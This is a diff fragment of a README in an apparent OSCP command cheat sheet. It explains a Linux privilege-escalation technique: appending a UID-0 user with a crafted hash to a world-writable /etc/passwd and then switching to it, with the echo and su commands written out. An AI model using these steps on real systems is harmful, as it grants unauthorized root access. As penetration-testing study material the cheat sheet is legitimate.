0xCOrS/OSCP_Command_Cheatsheet/README.md

 |Home Folder| "/home/joe" | Describes the user's home directory prompted upon login|
 |Login Shell| "/bin/bash" | Indicates the default interactive shell, if one exists|

+*/etc/passwd* shouldn't be word writable.
+If by any chance this is the case it is possible to add a new privileged user:
+1. Generate a *crypt* hash: `openssl passwd <password>`
+2. Add the new user to */etc/passwd* `echo "root2:<previously_obtained_hash>:0:0:root:/root:/bin/bash" >> /etc/passwd`
+3. Get privileged with `su root2`

+This is because in order to achieve backwards compatibility, if a password hash for a user is found on */etc/passwd* file, it is considered valid for auth over the hash for the same user contained on */etc/shadow* (Same happens if there is no entry for the same user on */etc/shadow*).

 ```
 # Current user
 whoami